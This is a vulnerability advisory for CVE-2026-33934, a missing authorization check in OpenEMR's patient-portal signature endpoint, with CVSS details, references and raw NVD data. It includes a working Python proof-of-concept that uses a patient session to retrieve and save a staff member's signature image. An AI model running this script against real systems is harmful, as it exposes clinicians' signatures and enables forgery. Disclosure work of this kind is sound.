CVE-2026-33934

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0.3 have a missing authorization check in `portal/sign/lib/show-signature.php` that allows any authenticated patient portal user to retrieve the drawn signature image of any staff member by supplying an arbitrary `user` value in the POST body. The companion write endpoint (`save-signature.php`) was already hardened against this same issue, but the read endpoint was not updated to match. Version 8.0.0.3 patches the issue.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* - VULNERABLE

OpenEMR < 8.0.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable endpoint
vulnerable_url = "http://target-openemr-site.com/portal/sign/lib/show-signature.php"

# Attacker's authenticated session cookie (e.g., low-priv patient account)
session_cookies = {
    "PHPSESSID": "attacker_valid_session_id_here"
}

# The vulnerability allows specifying any 'user' value to retrieve their signature
# In this example, we attempt to retrieve the signature of user ID '1' (often an admin)
payload_data = {
    "user": "1"
}

try:
    print("[*] Attempting to exploit CVE-2026-33934...")
    
    # Send POST request to the vulnerable endpoint
    response = requests.post(vulnerable_url, cookies=session_cookies, data=payload_data)
    
    # Check response status and content type to verify if data was retrieved
    if response.status_code == 200:
        content_type = response.headers.get('Content-Type', '')
        
        if 'image' in content_type:
            print("[+] Exploit successful! Signature image retrieved.")
            print(f"[+] Content-Type: {content_type}")
            
            # Save the stolen signature to a file
            with open("stolen_signature.png", "wb") as f:
                f.write(response.content)
            print("[+] File saved as 'stolen_signature.png'")
        else:
            print("[-] Unexpected response. Target may not be vulnerable or patched.")
            print("[-] Response body:", response.text[:200])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33934
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33934
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33934/
[4] VulDB https://vuldb.com/cve/CVE-2026-33934
[5] https://github.com/openemr/openemr/commit/ae7ee1872d2e6300b165e24687cc90cf6847a4e5
[6] https://github.com/openemr/openemr/releases/tag/v8_0_0_3
[7] https://github.com/openemr/openemr/security/advisories/GHSA-w9w5-7x6h-657q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33934", "sourceIdentifier": "[email protected]", "published": "2026-03-26T00:16:40.290", "lastModified": "2026-03-26T16:28:33.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEMR is a free and open source electronic health records and medical practice management application. Versions prior to 8.0.0.3 have a missing authorization check in `portal/sign/lib/show-signature.php` that allows any authenticated patient portal user to retrieve the drawn signature image of any staff member by supplying an arbitrary `user` value in the POST body. The companion write endpoint (`save-signature.php`) was already hardened against this same issue, but the read endpoint was not updated to match. Version 8.0.0.3 patches the issue."}, {"lang": "es", "value": "OpenEMR es una aplicación gratuita y de código abierto para la gestión de registros de salud electrónicos y práctica médica. Las versiones anteriores a la 8.0.0.3 tienen una verificación de autorización faltante en 'portal/sign/lib/show-signature.php' que permite a cualquier usuario autenticado del portal de pacientes recuperar la imagen de la firma dibujada de cualquier miembro del personal al proporcionar un valor 'user' arbitrario en el cuerpo POST. El endpoint de escritura asociado ('save-signature.php') ya estaba reforzado contra este mismo problema, pero el endpoint de lectura no se actualizó para coincidir. La versión 8.0.0.3 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.0.0.3", "matchCriteriaId": "E3E098AF-42A1-4798-85A7-80052F19F809"}]}]}], "references": [{"url": "https://github.com/openemr/openemr/commit/ae7ee1872d2e6300b165e24687cc90cf6847a4e5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openemr/openemr/releases/tag/v8_0_0_3", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openemr/openemr/security/advisories/GHSA-w9w5-7x6h-657q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}